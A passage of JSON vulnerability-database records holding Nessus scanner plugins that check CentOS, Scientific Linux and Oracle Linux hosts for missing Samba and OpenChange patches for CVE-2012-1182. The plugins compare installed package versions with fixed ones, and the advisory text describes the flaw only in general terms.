send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. 
After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 : samba (CESA-2012:0465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libsmbclient", "p-cpe:/a:centos:centos:libsmbclient-devel", "p-cpe:/a:centos:centos:samba", "p-cpe:/a:centos:centos:samba-client", "p-cpe:/a:centos:centos:samba-common", "p-cpe:/a:centos:centos:samba-doc", "p-cpe:/a:centos:centos:samba-domainjoin-gui", "p-cpe:/a:centos:centos:samba-swat", "p-cpe:/a:centos:centos:samba-winbind", "p-cpe:/a:centos:centos:samba-winbind-clients", "p-cpe:/a:centos:centos:samba-winbind-devel", "p-cpe:/a:centos:centos:samba-winbind-krb5-locator", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/58663", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0465 and \n# CentOS Errata and Security Advisory 2012:0465 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58663);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"CentOS 5 / 6 : samba (CESA-2012:0465)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages that fix one security issue are now available\nfor Red Hat 
Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0d314040\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e85d5c5a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++;\nif 
(rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:55:35", "description": "A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler. As OpenChange uses code generated by PIDL, this could have resulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version of PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which provides a number of bug fixes and enhancements over the previous version, including support for the rebased samba4 packages and several API changes.\n\nThis update also fixes the following bugs :\n\n - When the user tried to modify a meeting with one required attendee and himself as the organizer, a segmentation fault occurred in the memcpy() function.\n Consequently, the evolution-data-server application terminated unexpectedly with a segmentation fault. This bug has been fixed and evolution-data-server no longer crashes in the described scenario.\n\n - Prior to this update, OpenChange 1.0 was unable to send messages with a large message body or with extensive attachment. This was caused by minor issues in OpenChange's exchange.idl definitions. 
This bug has been fixed and OpenChange now sends extensive messages without complications.", "cvss3": {"score": null, "vector": null}, "published": "2013-03-05T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : openchange on SL6.x i386/x86_64 (20130221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:evolution-mapi", "p-cpe:/a:fermilab:scientific_linux:evolution-mapi-debuginfo", "p-cpe:/a:fermilab:scientific_linux:evolution-mapi-devel", "p-cpe:/a:fermilab:scientific_linux:openchange", "p-cpe:/a:fermilab:scientific_linux:openchange-client", "p-cpe:/a:fermilab:scientific_linux:openchange-debuginfo", "p-cpe:/a:fermilab:scientific_linux:openchange-devel", "p-cpe:/a:fermilab:scientific_linux:openchange-devel-docs", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20130221_OPENCHANGE_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/65013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65013);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : openchange on SL6.x i386/x86_64 (20130221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. 
As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes.\n\nThis update also fixes the following bugs :\n\n - When the user tried to modify a meeting with one\n required attendee and himself as the organizer, a\n segmentation fault occurred in the memcpy() function.\n Consequently, the evolution-data-server application\n terminated unexpectedly with a segmentation fault. This\n bug has been fixed and evolution- data-server no longer\n crashes in the described scenario.\n\n - Prior to this update, OpenChange 1.0 was unable to send\n messages with a large message body or with extensive\n attachment. This was caused by minor issues in\n OpenChange's exchange.idl definitions. 
This bug has been\n fixed and OpenChange now sends extensive messages\n without complications.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1303&L=scientific-linux-errata&T=0&P=331\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f0aa04e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:evolution-mapi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:openchange-devel-docs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"evolution-mapi-debuginfo-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-debuginfo-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-debuginfo / evolution-mapi-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:54:15", "description": "From Red Hat Security Advisory 2012:0465 :\n\nUpdated samba packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 : samba (ELSA-2012-0465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:libsmbclient", "p-cpe:/a:oracle:linux:libsmbclient-devel", "p-cpe:/a:oracle:linux:samba", "p-cpe:/a:oracle:linux:samba-client", "p-cpe:/a:oracle:linux:samba-common", "p-cpe:/a:oracle:linux:samba-doc", "p-cpe:/a:oracle:linux:samba-domainjoin-gui", "p-cpe:/a:oracle:linux:samba-swat", "p-cpe:/a:oracle:linux:samba-winbind", "p-cpe:/a:oracle:linux:samba-winbind-clients", "p-cpe:/a:oracle:linux:samba-winbind-devel", "p-cpe:/a:oracle:linux:samba-winbind-krb5-locator", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2012-0465.NASL", "href": "https://www.tenable.com/plugins/nessus/68506", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin 
were\n# extracted from Red Hat Security Advisory RHSA-2012:0465 and \n# Oracle Linux Security Advisory ELSA-2012-0465 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68506);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2012:0465\");\n\n script_name(english:\"Oracle Linux 5 / 6 : samba (ELSA-2012-0465)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0465 :\n\nUpdated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3\nLong Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. 
(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002740.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) 
flag++;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:03", "description": "Updated openchange packages that fix one security issue, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated 